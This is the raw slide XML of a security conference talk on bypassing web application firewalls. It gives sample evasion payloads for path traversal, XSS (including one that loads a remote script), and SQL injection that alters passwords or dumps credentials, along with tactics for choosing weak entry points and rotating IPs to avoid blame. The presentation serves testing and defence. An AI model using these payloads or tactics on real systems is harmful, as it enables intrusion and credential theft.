                        <a:t>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../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./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../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servercode.jsp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45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Expanding on Path Traversal/LFI Evasions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Mix &amp; Match / Synergy Attacks – USING RFI / Forward With Encoding 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Encoding Layers in Forward Calls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Multiple Encoding Layers in RFI Calls</a:t>
            </a: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Multiple Encoding Layers in FORWARD </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Calls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 smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Encoding</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2200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410035"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="989011" y="31242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forward?nextPage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LFI-page.jsp?file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=../../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etc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</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="FF0000"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>passwd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169331"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="989012" y="3931920"/>
          <a:ext cx="1089175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http://victim.com/download?path=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http://victim.com/forward?nextPage=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/LFI-page.jsp?file=</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr 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%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64</a:t>
                      </a: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29694"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="989011" y="1905000"/>
          <a:ext cx="1089175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http://victim.com/forward?nextPage=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/LFI-page.jsp?file=</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr 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%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64</a:t>
                      </a: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554312"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="989012" y="52578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http://victim.com/</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
                        <a:t>download?path</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0" smtClean="0"/>
                        <a:t>=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%2F%2F..%2F%2F..%2F%2Ffile.jsp</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US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Cross Site Scripting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2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XSS Evasion Techniques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DOM Payload Delivery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&lt;SCRIPT&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> date=‘[]‘; &lt;/SCRIPT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&gt;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HTML5 Tags and Events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&lt;INPUT type=text value</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>[]</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>”&gt;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Technology Specific Payloads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JQuery Payloads</a:t>
            </a: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94175"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="989011" y="18288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‘;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document.write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(window.name);//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685256"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="989012" y="22098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&lt;SCRIPT&gt;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window.open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("http://domain",”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&lt;script&gt;…&lt;/script&gt;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”);&lt;/SCRIPT&gt;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8221"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="989012" y="37338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abcd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" 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onafterprint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="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document.write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(window.name)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14299"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="989012" y="511556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‘;$(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location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).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attr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('</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="es-ES" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="FFFF00"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>href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','http://ha.ckers.org/xss.js');//</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US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0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SQL Injection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6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SQL Injection Evasion Techniques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Exotic Commands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tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SELECT * FROM mails WHERE id=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>[]</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2200" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FF0000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200" dirty="0" smtClean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Pattern Breaking Commands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SELECT * FROM mails WHERE id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>[]</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>’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schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Single Word Injection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SELECT * FROM mails WHERE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>id=‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>[]</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>’</a:t>
            </a:r>
          </a:p>
          <a:p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220980"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="989011" y="18288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123; BACKUP DATABASE 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AdventureWorks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 TO DISK = 'C:\</a:t>
                      </a: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AdventureWorks.BAK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' GO --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76864"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="993285" y="3303409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FFFF00"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>abcd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</a:rPr>
                        <a:t>'; UPDATE TABLE LOW_PRIORITY users SET pass=23456--</a:t>
                      </a:r>
                      <a:endParaRPr lang="es-ES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819614"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="989012" y="4800600"/>
          <a:ext cx="10891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75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value'UNION</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="es-ES" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="FF0000"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>%09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SELECT</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="es-ES" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="FF0000"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>-2</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="es-ES" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="FFFF00"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>,name,pass,'a</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US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38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1370012" y="3886200"/>
            <a:ext cx="9372600" cy="609600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="6000" b="0" dirty="0" smtClean="0"/>
              <a:t>These Payloads Are Obviously Just A Fraction of the Whole…</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="6000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8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Which Leads Us To…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8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12" y="1752600"/>
            <a:ext cx="784841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6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Purpose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Formalize Evasion Techniques Per Attack-Vector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Auto-Test WAF Policies In Customer Sites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False Negatives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False Positives</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800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212" y="2438400"/>
            <a:ext cx="686637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3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012" y="533400"/>
            <a:ext cx="9858375" cy="525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Challenges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Location Specific Virtual Patching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Anti-Automation Mechanisms</a:t>
            </a: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</a:rPr>
              <a:t>IP Exclusions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2832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WAF Bypass Process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TARGETS (Ideal Entry Points)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Backend of Native Mobile Apps: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BY </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ANTI-AUTOMATION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REST Services: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BY </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ANTI-AUTOMATION (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>REST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C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>MOBILE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New Services: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chemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>LESS LIKELY </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>TO BE PROTECTED </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>VIA WHITELIST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Free-text Features:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> AS PERMISSIVE AS IT GETS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UNBLOCKABLE ORIGINS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MOBILE ISP Network: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u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>VERY LIKELY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TO BE EXCLUDED FROM BLOCK </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(Similar IP Addresses For *.*)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Internal Network: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u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>VERY LIKELY</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> TO BE EXCLUDED FROM BLOCK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WAF Behavior Analysis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Patterns Blocked </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>– WHICH PATTERNS ARE TYPICALLY BLOCKED (MANUAL /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WAFEP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Target Analysis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Legitimate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Traffic Analysis </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>– Which Value Formats Are Sent and to Where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Technology Analysis </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>– Which Components Compose the Backend, Frontend, and Client Code</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRP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endParaRPr lang="en-US" b="1" u="sng" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx1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06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60" y="1295399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089646"/>
            <a:ext cx="9982200" cy="990600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p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 (Educational Guidelines)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Right Arrow 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-8467" y="2602025"/>
            <a:ext cx="9150879" cy="48204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Right Arrow 12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-8467" y="2798599"/>
            <a:ext cx="8541279" cy="35267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612" y="328564"/>
            <a:ext cx="477202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8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>
          <a:xfrm>
            <a:off x="2513012" y="0"/>
            <a:ext cx="9372600" cy="609600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r"/>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" smtClean="0"/>
              <a:t>Evasion Methodology Summary</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="0" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="15" name="Picture 10" descr="http://blogspc.com/wp-content/uploads/2011/09/Microsoft.Net-Framework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50" y="9313049"/>
            <a:ext cx="383736" cy="2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>
            <a:off x="227012" y="685800"/>
            <a:ext cx="11811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13"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="303212" y="990600"/>
            <a:ext cx="10820399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PICK ON THE WEAK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NO-WHITELIST:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Test Entry Points Less Likely to be Protected via Whitelist (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>NEW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C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Agile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C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>False Positive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NO-ANTI-AUTOMATION:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Test Entry Points That Can’t Be Protected via Anti-Automation (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>REST</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> / </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>MOBILE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NO-IP-REPUTATION:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Use The IP of a Mobile ISP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KNOW YOUR ENEMY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TECH-RECONSSAINCE:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Analyzing the Technologies in Use is KEY to Identifying Evasion Vectors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TECH-RESEARCH:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Protocols and Features Supported Are Technology </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Dependent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BUILDING-BLOCK-MAPPING:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Identify Words and Characters that You Can Use</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="273050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KEEP QUIET AND LET THE BLAME FALL ON OTHERS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USE OTHER ADDRESSES FOR TESTING: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EXPERIMENT FROM A SECONDARY IP ADDRESS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="593090" lvl="1">
              <a:buClr>
                <a:srgbClr val="C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SWAP ATTACK INFRASTRUCTURE:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> SWAP IP/Browser/VM FROM TIME TO TIME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73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8467" y="1295400"/>
            <a:ext cx="12188825" cy="5428439"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="0">
                <a:schemeClr val="bg1"/>
              </a:gs>
              <a:gs pos="3400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Rectangle 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-8467" y="6731000"/>
            <a:ext cx="12188825" cy="152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Rectangle 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="-8467" y="6716677"/>
            <a:ext cx="12188825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8467" y="1676400"/>
            <a:ext cx="12197291" cy="42334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none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400" dirty="0" smtClean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440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53988" y="1676400"/>
            <a:ext cx="12197291" cy="42334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 cap="none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4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4400" dirty="0"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467" y="4724400"/>
            <a:ext cx="12197291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b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500" dirty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500" dirty="0" smtClean="0">
                <a:effectLst>
                  <a:reflection blurRad="228600" stA="47000" endPos="64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@sectooladdict</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4500" dirty="0">
              <a:effectLst>
                <a:reflection blurRad="228600" stA="47000" endPos="64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63405</TotalTime>
  <Words>1736</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Custom</PresentationFormat>
  <Paragraphs>352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Franklin Gothic Medium</vt:lpstr>
      <vt:lpstr>Gisha</vt:lpstr>
      <vt:lpstr>Wingdings</vt:lpstr>
      <vt:lpstr>Business Contrast 16x9</vt:lpstr>
      <vt:lpstr>The Unwanted Sons</vt:lpstr>
      <vt:lpstr>About Us</vt:lpstr>
      <vt:lpstr>What’s The Point ?</vt:lpstr>
      <vt:lpstr>WAF / IPS / Security Filter</vt:lpstr>
      <vt:lpstr>WAF - What Does It Do ?</vt:lpstr>
      <vt:lpstr>Attack Mitigation Perquisites</vt:lpstr>
      <vt:lpstr>Attack Mitigation Perquisites</vt:lpstr>
      <vt:lpstr>WAF Challenges in the Modern Age</vt:lpstr>
      <vt:lpstr>WAF Modules</vt:lpstr>
      <vt:lpstr>Negative Security Modules</vt:lpstr>
      <vt:lpstr>Positive Security Modules</vt:lpstr>
      <vt:lpstr>Positive Security Modules</vt:lpstr>
      <vt:lpstr>Positive Security Modules</vt:lpstr>
      <vt:lpstr>Pillars of Modern Applications</vt:lpstr>
      <vt:lpstr>Implementation Challenges</vt:lpstr>
      <vt:lpstr>Leaving Us With Signatures…</vt:lpstr>
      <vt:lpstr>Additional Reasons for Incomplete Implementation</vt:lpstr>
      <vt:lpstr>Evasion Techniques In A Glimpse</vt:lpstr>
      <vt:lpstr>How Evasion Techniques Are Typically Viewed</vt:lpstr>
      <vt:lpstr>Let’s Just Simplify Things…</vt:lpstr>
      <vt:lpstr>Here’s What We DO Have</vt:lpstr>
      <vt:lpstr>Here’s What We DON’T Have</vt:lpstr>
      <vt:lpstr>Doing it Manually Is Typically a Mess</vt:lpstr>
      <vt:lpstr>Here’s What We’ll Do NOW -</vt:lpstr>
      <vt:lpstr>Methodology</vt:lpstr>
      <vt:lpstr>WAF Bypass Process</vt:lpstr>
      <vt:lpstr>Remote File Inclusion (RFI) / SSRF</vt:lpstr>
      <vt:lpstr>Prevention Methods &amp; Evasion Building Blocks</vt:lpstr>
      <vt:lpstr>RFI/SSRF Evasion Techniques</vt:lpstr>
      <vt:lpstr>Expanding on RFI/SSRF Evasions</vt:lpstr>
      <vt:lpstr>OS Command Injection</vt:lpstr>
      <vt:lpstr>OS Commanding Evasion Techniques</vt:lpstr>
      <vt:lpstr>Path Traversal / Local File Inclusion</vt:lpstr>
      <vt:lpstr>Path Traversal / LFI Evasion Techniques</vt:lpstr>
      <vt:lpstr>Expanding on Path Traversal/LFI Evasions</vt:lpstr>
      <vt:lpstr>Cross Site Scripting</vt:lpstr>
      <vt:lpstr>XSS Evasion Techniques</vt:lpstr>
      <vt:lpstr>SQL Injection</vt:lpstr>
      <vt:lpstr>SQL Injection Evasion Techniques</vt:lpstr>
      <vt:lpstr>These Payloads Are Obviously Just A Fraction of the Whole…</vt:lpstr>
      <vt:lpstr>Which Leads Us To…</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Purpose</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Challenges</vt:lpstr>
      <vt:lpstr>WAF Bypass Process</vt:lpstr>
      <vt:lpstr>Summary (Educational Guidelines)</vt:lpstr>
      <vt:lpstr>Evasion Methodology Summary</vt:lpstr>
      <vt:lpstr>Questions     @sectooladdict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han sigalit MHT 58632,81757</dc:creator>
  <cp:lastModifiedBy>Shay Chen</cp:lastModifiedBy>
  <cp:revision>1910</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2013-12-03T00:46:34Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2016-10-13T05:47:03Z</dcterms:modified>
</cp:coreProperties>
</file>